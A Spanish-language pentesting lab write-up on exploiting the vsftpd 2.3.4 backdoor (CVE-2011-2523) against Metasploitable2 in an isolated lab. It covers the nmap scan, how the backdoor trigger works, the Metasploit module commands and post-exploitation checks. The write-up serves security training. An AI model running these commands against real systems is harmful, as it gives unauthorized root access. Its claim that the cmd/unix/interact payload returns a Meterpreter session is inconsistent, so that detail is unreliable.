
Explotando la puerta trasera de vsftpd 2.3.4 (CVE-2011-2523) en Metasploitable2 — un informe práctico de laboratorio de pentesting que cubre reconocimiento, explotación y remediación.
Un laboratorio práctico que demuestra el descubrimiento y la explotación de una vulnerabilidad de backdoor conocida en vsftpd 2.3.4, utilizando un entorno aislado Kali Linux ↔ Metasploitable2.
Practicar el flujo de trabajo principal de las pruebas de penetración — reconocimiento, identificación de vulnerabilidades, explotación y verificación posterior a la explotación — contra una máquina objetivo deliberadamente vulnerable.
| Componente | Detalles |
|---|---|
| Atacante | Kali Linux 2026.1 (VMware) |
| Objetivo | Metasploitable2 (VMware) |
| Red | NAT, aislada del host/internet |
| IP del objetivo | 192.168.233.129 |
Ambas máquinas virtuales se mantuvieron en el mismo segmento de red privada, aisladas de la red real, para garantizar que el ejercicio no tuviera exposición externa.
nmap -sV -sC 192.168.233.129
Se escaneó el objetivo en busca de puertos abiertos y versiones de servicios. Los resultados incluyeron:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

El puerto 21 ejecutaba vsftpd 2.3.4. Se sabe públicamente que esta versión específica contiene un backdoor: en 2011, el archivo fuente oficial de vsftpd fue comprometido y se insertó código malicioso. Iniciar sesión con un nombre de usuario que contenga la cadena :) activa un listener oculto en el puerto TCP 6200, otorgando un shell remoto sin autenticación.
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
El exploit activó exitosamente el backdoor y devolvió una sesión de Meterpreter.

sessions -i 1
sysinfo
getuid
Se confirmó la sesión activa y el nivel de acceso en el host comprometido.


Se obtuvo acceso total al shell remoto a nivel root en la máquina objetivo, sin requerir autenticación, explotando un único servicio desactualizado y con backdoor.
Un único servicio desactualizado con una vulnerabilidad conocida y pública fue suficiente para comprometer completamente el sistema — sin necesidad de desarrollo de exploits personalizados ni técnicas avanzadas. Esto resalta por qué la gestión de parches y la higiene de versiones son fundamentales para la postura de seguridad en el mundo real.
Este ejercicio se realizó exclusivamente contra Metasploitable2, una máquina virtual deliberadamente vulnerable diseñada para formación en seguridad, dentro de una red de laboratorio aislada sin conexión a sistemas de producción ni infraestructura de terceros.